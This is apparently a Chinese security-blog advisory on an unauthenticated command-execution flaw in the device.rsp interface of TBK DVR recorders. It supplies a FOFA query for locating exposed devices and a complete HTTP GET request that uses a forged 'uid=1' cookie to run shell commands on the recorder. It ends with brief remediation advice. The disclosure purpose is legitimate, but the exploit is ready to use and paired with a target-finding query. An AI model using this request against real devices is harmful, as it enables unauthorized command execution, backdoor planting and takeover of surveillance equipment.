TBKDVR硬盘录像机device.rsp命令执行漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

TBK DVR硬盘录像机 device.rsp 接口处存在命令执行漏洞,未经身份验证的远程攻击者可以利用此漏洞绕过cookie认证执行任意系统指令,写入后门文件,获取录像机shell权限。

漏洞再现

fofa:"Location: /login.rsp"
GET /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=uname%20-a;pwd;ls HTTP/1.1

Host: ip

Cookie: uid=1

修复建议

1、请联系厂商进行修复。 2、如非必要,禁止公网访问该系统。 3、设置白名单访问。

相关推荐
IndulgeCui5 分钟前
KES集群部署安装问题记录
数据库
liebe1*15 分钟前
第七章 防火墙地址转换
运维·服务器·网络
Yilena10 分钟前
通过mysqldump进行数据迁移时权限不足的解决方案
数据库·学习
好好学操作系统11 分钟前
autodl 保存 数据 跨区
linux·运维·服务器
KingRumn14 分钟前
Linux同步机制之信号量
linux·服务器·网络
嵌入式学习菌14 分钟前
SPIFFS文件系统
服务器·物联网
旺仔Sec14 分钟前
2026年度河北省职业院校技能竞赛“Web技术”(高职组)赛项竞赛任务
运维·服务器·前端
韩立学长17 分钟前
基于Springboot酒店管理系统的设计与实现c12044zy(程序、源码、数据库、调试部署方案及开发环境)系统界面展示及获取方式置于文档末尾,可供参考。
数据库·spring boot·后端
han_hanker18 分钟前
统一拦截异常 @RestControllerAdvice
java·开发语言·数据库
BullSmall35 分钟前
linux 根据端口查看进程
linux·运维·服务器